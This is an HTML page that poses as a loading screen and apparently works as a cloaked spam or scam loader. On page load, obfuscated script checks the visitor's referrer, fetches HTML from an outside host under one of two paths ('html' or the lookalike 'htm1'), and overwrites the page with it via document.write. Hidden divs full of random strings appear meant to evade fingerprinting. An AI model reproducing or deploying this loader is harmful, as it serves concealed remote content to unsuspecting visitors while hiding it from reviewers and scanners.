<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aT03asQw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aT03asQw .paiwouN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aT03asQw .content {
            line-height: 50px;
            text-align: center
        }

        .aT03asQw .img {
            width: 100%
        }

        .aT03asQw .a3yWKBiTv2q {
            text-align: center
        }

        .aT03asQw .a3yWKBiTv2q span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aT03asQw .a3yWKBiTv2q span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aT03asQw .a3yWKBiTv2q span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aT03asQw .a3yWKBiTv2q span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aT03asQw .a3yWKBiTv2q span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aT03asQw .a3yWKBiTv2q span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aT03asQw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function u2Jr8Yzu3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Nfz7zgS = u2Jr8Yzu3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Nfz7zgS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Nfz7zgS +".html?a=share";
		}
		
        dR8cihEP=url+"#"+new Date().getTime();
        dR8cihEP && function() {
            $.get(dR8cihEP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>AREXaTI3AA65Z81N7CWVIQ8vHv8hxrCZFPYOA8XvUcTJc19U3EITssCUMmZrsuec9mITQU</a>
<div style='display:none'>qBxZtqqnx2IzfgK5aUgYMzTk1pRMahIX2wb0FhN8qmJHuZcQ0a9cQ1o2sHf1UmbBQDR0xiFHZI</div>
<ul style='display:none' >lD3j1Gpb7b7OGZi3HklEUrxE3cUczj75nqkk7YHra4ss2l9lHkVTWE2w4dApWf</ul><div class="aT03asQw">
    <div class="paiwouN">
        <div class="a3yWKBiTv2q">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >FEN9X5AXygHkMIRq8eEUbj7qj</ul>
<p  style='display:none'>bq5BH3zn5jtOrwxvLrMtnjVjn8yJhzPgxQC6vJTh2tKLnS99</p>
<ul style='display:none' >FEN9X5AXygHkMIRq8eEUbj7qj</ul>
<span style='display:none'>uaTRCXt8xc8d9VKWJv98DPXiv0pY</span>
<img  src='' style='display:none'>
<ul style='display:none' >FEN9X5AXygHkMIRq8eEUbj7qj</ul>
<img  src='' style='display:none'>
<p  style='display:none'>bq5BH3zn5jtOrwxvLrMtnjVjn8yJhzPgxQC6vJTh2tKLnS99</p></body>
</html>